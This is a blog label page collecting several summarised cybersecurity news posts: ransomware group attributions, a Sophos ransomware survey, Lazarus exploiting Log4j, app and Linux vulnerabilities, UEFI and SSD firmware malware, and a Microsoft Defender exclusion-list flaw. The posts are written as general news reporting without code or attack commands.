Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label Security Researchers. Show all posts
threat analysis
3AM Conti Cyber Security cybercrime gangs Data Leaks intrusion tactics malware ranso Ransomware Royal Security Researchers threat analysis

Security Researchers Establish Connections Between 3AM Ransomware and Conti, Royal Cybercriminal Groups

 

Security researchers examining the operations of the recently surfaced 3AM ransomware group have unveiled strong connections with notorious entities like the Conti syndicate and the Royal ransomware gang.

The 3AM ransomware, also known as ThreeAM, has adopted a novel extortion strategy: publicly revealing data leaks to victims' social media followers and utilizing bots to respond to influential accounts on X (formerly Twitter), directing them to the compromised data.

Initially observed by Symantec's Threat Hunter Team in mid-September, 3AM gained attention after threat actors shifted from deploying LockBit malware. According to French cybersecurity firm Intrinsec, ThreeAM is likely affiliated with the Royal ransomware group, now rebranded as Blacksuit, consisting of former members of Team 2 within the Conti syndicate.

As Intrinsec delved into their investigation, they found substantial overlap in communication channels, infrastructure, and tactics between 3AM and the Conti syndicate. Notably, an IP address listed by Symantec as a network indicator of compromise led researchers to a PowerShell script for dropping Cobalt Strike on VirusTotal.

Further investigation uncovered a SOCKS4 proxy on TCP port 8000, a TLS certificate associated with an RDP service, and HTML content from 3AM's data leak site indexed by the Shodan platform. The servers involved were traced back to the Lithuanian hosting company, Cherry Servers, known for hosting malware despite having a low fraud risk.

Intrinsec's findings aligned with a report from Bridewell, connecting the IP subnet to the ALPHV/BlackCat ransomware operation. This group, not part of the Conti syndicate but allied, was identified as having ties to IcedID malware used in Conti attacks.

In addition to technical details, Intrinsec uncovered 3AM's experiment with a new extortion technique. The gang set up a Twitter account in August, using it to reply to tweets from victims and high-profile accounts, linking to the data leak site on the Tor network. Intrinsec suspected the use of a Twitter bot for a name-and-shame campaign, noting an unusually high volume of automated replies.

Despite 3AM's perceived lack of sophistication compared to Royal, the researchers cautioned against underestimating its potential for deploying numerous attacks. The article concludes with a broader context on the Conti syndicate, its dissolution, and the emergence of affiliated groups like Royal ransomware.
Read more »
Sophos
CTO Cyber Attacks Cybersecurity IT Projects Security Researchers Sophos

Sophos Says Nearly Every Company Was Attacked Last Year

 


Organizations are constantly bombarded with malicious activity, suffering negative impacts. In the State of Ransomware 2022 report, published by Sophos, a global leader in next-generation cybersecurity, a comprehensive overview of the real-world ransomware experiences of consumers has been provided to the public. According to the report, ransomware-affected organizations increased 66% from 37% in 2020 to 66% in 2021. 

For organizations, cyberattacks are not a matter of chance but something that must be prepared for daily. As per a recent survey released by Sophos on Tuesday, almost all organizations (94%) have suffered from some form of a cyberattack within the last year. 

Researchers warned companies to prepare themselves for being targets by 2023. Organizers are reeling under the constant barrage of malicious activity perpetrated against them. Several threats that face businesses today have become too advanced for them to respond to themselves and deal with on their own. In most cases, organizations report that cyber threats negatively impact their ability to complete IT projects on time or devote time to strategic issues. 

As a result of the most significant ransomware attack on an organization that encrypts data, the average ransom paid by the company has nearly fivefold increased to $812,360. The percentage of companies paying $1 million in ransoms has increased threefold. 

According to John Shier, field CTO of commercial at Sophos, "Many organizations are overwhelmed with routine operational responsibilities as well as strategic initiatives." Consequently, they react to what is happening around them and cannot improve their situation. This is because they are constantly on their backs. After all, they are continually distracted by the present. 

Approximately 5,600 mid-size companies in 31 countries in Europe, the Americas, Asia-Pacific, Central Asia, the Middle East, and Africa share details regarding ransomware payments in the report. It contains information about ransomware attacks on 5,600 mid-size companies in 31 countries overseas. Based on a survey conducted in 14 countries over three months, the report was compiled. There were two surveys conducted in January and February of this year. 

Almost all responders (93%), said they found many of the essential security operations tasks challenging, and only half of the security alerts are investigated by their security teams. According to the survey results, three-quarters of respondents had difficulty identifying the root cause of cyberattacks. 

According to the State of Ransomware 2022 global survey, which examines ransomware incidents in 2021, and cyber insurance issues related to them, the following are the main findings: 

An increase in ransom payments - in 2021, 11% of organizations paid a ransom of $1 million or more, a substantial increase from the 4% that incurred this ransom in 2020. On the other hand, the number of organizations paying less than $10,000 dropped from 34% in 2020 to 21% in 2021.

In 2021, 46% of victims affected by ransomware attacks that encrypted their data paid a ransom in compensation for the loss of their data. 26 percent of organizations paid a ransom to obtain encrypted data in 2021 after restoring data from backups. 

Ransomware attacks pose many risks. Recovery from the latest ransomware attack in 2021 cost an average of $1.4 million per computer, which was the cost of the latest attack. Recovery from the damage and disruption took about a month as a result of the incident. The attack affected six out of 10 organizations in operations, with ninety percent saying it disrupted their operations. The private sector made up 86% of the victims of the attack, with the majority of them having lost revenue or business as a consequence.

To recover from a ransomware attack, organizations often depend on cyber insurance to cover the costs incurred by the organization. According to the survey, 83% of mid-sized companies were protected by cyber insurance in a ransomware attack. In 98% of these incidents, the insurer paid at least a portion (40 percent covered the ransom payment). 

According to the research, ninety-four percent of cyber insurance owners have seen a change in their experiences in the past year, when compared with the year before. It has been found that cybersecurity measures have been increasingly imposed as a result of increasing demands, complicated or expensive policies, and fewer organizations offering insurance coverage. 

It is reported that, according to the survey of IT and cybersecurity leaders, there are five cyber threats of particular concern: data theft, phishing, ransomware, extortion, and DDoS attacks. This year, only 1% of IT leaders say they are not worried about cyberattacks affecting their organizations shortly.   
Read more »
Vulnerabilities and Exploits
Bugs Flaws Hackers Log4j North Korea Security Researchers Threat Intelligence Vulnerabilities and Exploits

Lazarus Hackers are Using Log4j to Hack US Energy Companies

 

A new cyber espionage campaign targeting US, Canadian, and Japanese energy providers has been linked to the North Korean state-sponsored Lazarus hacking group, according to security researchers.

Cisco Talos, a threat intelligence company, announced Thursday that Lazarus, also known as APT38, was observed targeting unidentified energy providers in the United States, Canada, and Japan between February and July of this year. 

According to Cisco's findings, the hackers exploited a year-old Log4j vulnerability known as Log4Shell to compromise internet-exposed VMware Horizon servers in order to gain an initial foothold on a victim's enterprise network before deploying bespoke malware known as "VSingle" and "YamaBot" to gain long-term persistent access. 

Japan's national cyber emergency response team, known as CERT, recently linked YamaBot to the Lazarus APT. Symantec first disclosed information of this espionage campaign in April of this year, attributing the operation to "Stonefly," another North Korean hacking group with some overlaps with Lazarus.

However, Cisco Talos discovered a previously unknown remote access trojan (RAT) called "MagicRAT," which is attributed to the Lazarus Group and is used by hackers for reconnaissance and credential theft.

Talos researchers Jung soo An, Asheer Malhotra, and Vitor Ventura, “The main goal of these attacks was likely to establish long-term access into victim networks to conduct espionage operations in support of North Korean government objectives. This activity aligns with historical Lazarus intrusions targeting critical infrastructure and energy companies to establish long-term access to siphon off proprietary intellectual property.”

However, in recent months, the group has shifted its focus to blockchain and cryptocurrency organisations. It has been associated with the recent thefts of $100 million in cryptocurrency from Harmony's Horizon Bridge and $625 million in cryptocurrency from the Ronin Network, an Ethereum-based sidechain created for the popular play-to-earn game Axie Infinity.

Pyongyang has long used stolen cryptocurrency and information theft to finance its nuclear weapons programme. In July, the United States offered a $10 million reward for data on members of state-sponsored North Korean threat groups, including Lazarus, more than doubling the amount previously offered. The State Department made the announcement in April.

The Lazarus Group is a North Korean-backed hacking organisation best known for the high-profile Sony hack in 2016 and the WannaCry ransomware attack in 2017. Lazarus is also motivated by efforts to support North Korea's state objectives, such as military R&D and evasion of international sanctions.
Read more »
User Security
Account Takeover Cyber Security Security Researchers User Data User Security

Zenly Addressed the Risks of User Data Exposure and Account Takeover

 

Zenly, a social app from Snap that allows users to monitor the positions of friends and family on a live map, has two flaws that potentially imperil people being tracked. The issues are a user-data disclosure vulnerability and an account-takeover vulnerability, according to the Checkmarx Security Research Team.   

Zenly is a real-time location sharing software created in 2015 by Alexis Bonillo and Antoine Martin in Paris, France. Zenly's primary role is to share and monitor locations with friends. The software may communicate not only your current position, but also your mobile direction and speed. Zenly employs dependable, effective, and precise positioning technology to pinpoint the precise location of friends or family members. 

According to Checkmarx, the vulnerability exploits the "Add by Username" procedure, which begins by searching for a known username. Then, to view requests that occur during the username search, "an environment that permits intercepting and decoding network requests to get visibility into network activities" can be employed. 

“By observing the response of the request that was executed on the /UserPublicFriends endpoint, a list of friends can be seen, although it is not displayed on the user interface of the application,” according to the analysis. “This list contains every friend of the user, one of them is Bogus_CEO (bogus CEO of Zenly, for demonstration purposes). Note that the response also contains their username, which could in turn be used to repeat this process and obtain their friends list instead.” 

According to the researchers, after the target username has been found, the same interceptor may be used to retrieve the associated phone number via a view named "Add by Username," then clicking the "Add as Friend" button.

This vulnerability's mitigation strategy can be divided into two phases. The most serious consequences are from gaining access to a user's Personally Identifiable Information (PII) without their permission. This could be avoided by eliminating the target phone number field from the reply sent when a friend request is created. The second step in this mitigation recommendation is to effectively limit or shape the data supplied by the /UserPublicFriends endpoint when a username search is performed, rather than returning an entire list of the friends' usernames. 

According to Checkmarx, the second bug appears in the user-authentication flow. This authentication uses SMS messages carrying verification numbers to validate sessions. After sending the SMS message to the user, the app uses the session token and the SMS verification code to access the /SessionVerify endpoint. 

Both vulnerabilities have been fixed, and users should update their apps to the most recent version to avoid compromise, according to the company.
Read more »
Vulnerabilities and Exploits
Linux Systems Root Privilege Security Researchers Vulnerabilities and Exploits

Several Vulnerabilities were Discovered in the Snap-Confine Function on Linux Systems

 

Security researchers from Qualys uncovered various flaws in Canonical's Snap software packaging and deployment system. Bharat Jogi, head of vulnerability and threat research at Qualys, revealed in a blog post that they discovered many vulnerabilities in the snap-confine function on Linux operating systems, "the most important of which can be abused to escalate privilege to gain root rights." 

Canonical created Snap, a software packaging and distribution mechanism for operating systems that use the Linux kernel. The packages, known as snaps, and the tool used to use them, snapd, are compatible with a variety of Linux distributions and enable upstream software developers to deliver their applications directly to users. Snaps are standalone applications that run in a sandbox and have mediated access to the host system. Snap-confine is a software that snapd uses internally to build the execution environment for snap applications. 

If this vulnerability is successfully exploited, any unprivileged user can get root privileges on the vulnerable system. Qualys security researchers were able to independently validate the vulnerability, create an exploit, and get full root access on default Ubuntu installations. Canonical cooperated in responsible vulnerability disclosure and coordinated with both vendor and open-source distributions to announce this newly identified vulnerability as soon as the Qualys Research Team confirmed it. 

Canonical, the publisher of Ubuntu, said in a statement that they tried to ensure that the subsystems on which the snap platform is based are utilised safely throughout the development process. They pointed out that, because of automatic refreshes, the majority of snap-distributed platform installations around the world have already been updated.

In addition, Qualys detected six more vulnerabilities. They detailed each vulnerability and asked all users to patch as soon as feasible. “Unfortunately, such a modern confinement platform involves many subsystems, and sometimes we make mistakes. Thankfully, Canonical and Ubuntu are part of a large community that includes competent security researchers. Recently, Qualys informed us that one of the tools a part of the snap platform contains a security issue,” a Canonical spokesperson said. 

“In their words: Discovering and exploiting a vulnerability in snap-confine has been extremely challenging (especially in a default installation of Ubuntu), because snap-confine uses a very defensive programming style, AppArmor profiles, seccomp filters, mount namespaces, and two Go helper programs,” the spokesperson added.
Read more »
Security Researchers
APT China Kaspersky malware Security Researchers

APT41 Used the New MoonBounce UEFI Malware in Targeted Attacks

 

According to the Kaspersky researchers who discovered it, a new firmware bootkit discovered in the wild demonstrates remarkable advances over previous similar tools. MoonBounce is a harmful implant that hides in a computer's UEFI firmware in the system's SPI flash - a storage component external to the hard drive, making it difficult to remove and difficult for proprietary security products to detect. UEFI is a technical specification that aids in the interoperability of computer systems' operating systems (OS) and firmware software. 

Being able to place malicious code known as a "UEFI bootkit" in the firmware is an ideal approach to avoid detection by antivirus software and other security measures running at the OS level. This has been done before, with the FinFisher malware and the ESPecter backdoor being two recent instances. In general, these tools hijack the boot sequence and initialize it before the operating system's security components. They are extremely tenacious because they nest in regions that cannot be wiped, such as reserved disk space. 

"The source of the infection starts with a set of hooks that intercept the execution of several functions in the EFI Boot Services Table, namely AllocatePool, CreateEventEx, and ExitBootServices," explains Kaspersky in the report. "Those hooks are used to divert the flow of these functions to malicious shellcode that is appended by the attackers to the CORE_DXE image, which in turn sets up additional hooks in subsequent components of the boot chain, namely the Windows loader." 

MoonBounce is the third bootkit identified in the wild, following LoJax and MosaicRegressor, and it shows "substantial development, with a more sophisticated attack flow and better technical sophistication" when compared to predecessors. It was discovered in 2021 by Kaspersky using its Firmware Scanner, which is designed to detect threats hidden in the ROM BIOS, including UEFI firmware images.

Kaspersky discovered a plethora of evidence linking MoonBounce to APT41, ranging from the deployment of the ScrambleCross malware itself to unique certificates acquired from its C2 servers that correspond to earlier FBI reports on APT41 activities. While the United States Department of Justice discovered and charged five APT41 members in September 2020, the presence of MoonBounce and the operation around it demonstrates that the threat actors were not deterred by the legal pressure. 

According to the telemetry data, the attacks were extremely targeted, and Kaspersky only detected the firmware rootkit on one occasion. Kaspersky discovered several malware samples and loaders in other devices on the same network, however, they were non-UEFI implants. Microcin backdoor, Mimikat credential stealer, Go implant, StealthMutant loader, and ScrambleCross malware are a few examples.
Read more »
Windows Defender
Cyber Security Microsoft Security Researchers Threat actors Windows Defender

Because of a Flaw in Microsoft Defender, Threat Actors can Evade Detection

 

Threat actors were able to use a vulnerability in Microsoft Defender antivirus on Windows to learn about unscanned places and plant malware there. According to several users, the issue has existed for at least eight years and affects both Windows 10 21H1 and Windows 10 21H2. According to security researchers, the list of locations that are not scanned by Microsoft Defender are insecure and accessible to any local user. 

Windows Defender is an anti-malware component of Microsoft Windows. It was first made available as a free anti-spyware download for Windows XP, and it was then bundled with Windows Vista and Windows 7. It has evolved into a full antivirus solution, replacing Microsoft Security Essentials in Windows 8 and later editions. 

Local users, regardless of their permissions, can query the registry to see which paths Microsoft Defender is not permitted to check for malware or hazardous files. According to Antonio Cocomazzi, a SentinelOne threat researcher who reported the RemotePotato0 vulnerability, there is no protection for this sensitive information, and running the "reg query" command reveals everything that Microsoft Defender is not supposed to scan, whether it is files, folders, extensions, or processes. 

Like any other antivirus software, Microsoft Defender allows customers to specify which locations (local or network) on their PCs should be excluded from malware scanning. Exclusions are routinely used to keep antivirus software from interfering with the operation of legitimate apps that have been incorrectly labeled as malware. Because the list of scanning exceptions differs from user to user, this information is useful for an attacker on the system because it informs them where they can place harmful files without fear of being detected. 

However, Microsoft Defender Antivirus on Windows Server 2016 and Windows Server 2019 enrolls users in particular exclusions based on their server role. These exclusions are not included in the normal exclusion lists. Exclusions for operating system files and server roles are automated because Microsoft Defender Antivirus is incorporated into Windows Server 2016 and later. Custom exclusions, on the other hand, can be specified by users. 

Although a threat actor must have local access in order to obtain the Microsoft Defender exclusions list, this is far from a stumbling block. Many attackers are already accessing stolen business networks in quest of a technique that will allow them to go laterally as silently as possible. 

According to BleepingComputer, the flaw was discovered in May by researcher Paul Bolton. Because Microsoft has yet to patch the flaw, administrators should use group policy to set Microsoft Defender while installing their systems, according to security researchers.
Read more »
SSD
Cyber Security firmware Security Researchers South Korea SSD

Firmware Attacks can Leave Persistent Malware in the SSD's Hidden Section

 

Korean researchers have created a set of assaults against some solid-state drives (SSDs) that could allow malware to be planted at a position beyond the user's and security solutions' reach. The attack models are designed for drives with flex capacity characteristics and target a hidden section on the device known as over-provisioning, which is extensively used by SSD manufacturers these days for performance improvement on NAND flash-based storage systems. 

The over-provisioning region is invisible to the operating system and any applications that run on it, including security and anti-virus software. The SSD manager dynamically adjusts this space against the workloads when the user runs different applications, depending on how write or read-intensive they are. 

Flex capacity is a feature of Micron Technology SSDs that allows storage devices to automatically modify the sizes of raw and user-allocated space to improve performance by absorbing write workload volumes. It is a dynamic system that builds and changes a buffer of space which typically consumes between 7% and 25% of total disk capacity. 

Hardware-level assaults provide the highest level of persistence and stealth. In the past, sophisticated actors worked hard to execute such concepts against HDDs, concealing dangerous code in unreachable disk sectors. One assault modeled by researchers at Korea University in Seoul targets an invalid data area containing non-erased information that resides between the usable SSD space and the over-provisioning (OP) area, the amount of which depends on the two. According to the research article, a hacker can adjust the size of the OP region using the firmware manager, resulting in exploitable invalid data space. 

In a second attack model, the OP region is used as a covert location where a threat actor can hide malware that users cannot monitor or remove. According to the research article, "It is assumed that two storage devices SSD1 and SSD2 are connected to a channel in order to simplify the description. Each storage device has 50% OP area. After the hacker stores the malware code in SSD2, they immediately reduce the OP area of SSD1 to 25% and expand the OP area of SSD2 to 75%." 

"At this time, the malware code is included in the hidden area of SSD2. A hacker who gains access to the SSD can activate the embedded malware code at any time by resizing the OP area. Since normal users maintain 100% user area on the channel, it will not be easy to detect such malicious behaviour of hackers," the article added.

To counteract the first type of assault, the researchers advise that SSD manufacturers wash the OP area with a pseudo-erase algorithm that has no effect on real-time performance. Implementing valid-invalid data rate monitoring systems that monitor the ratio inside SSDs in real-time is a potentially effective security measure against injecting malware in the OP area for the second type of attack.
Read more »
Subscribe to: Posts (Atom)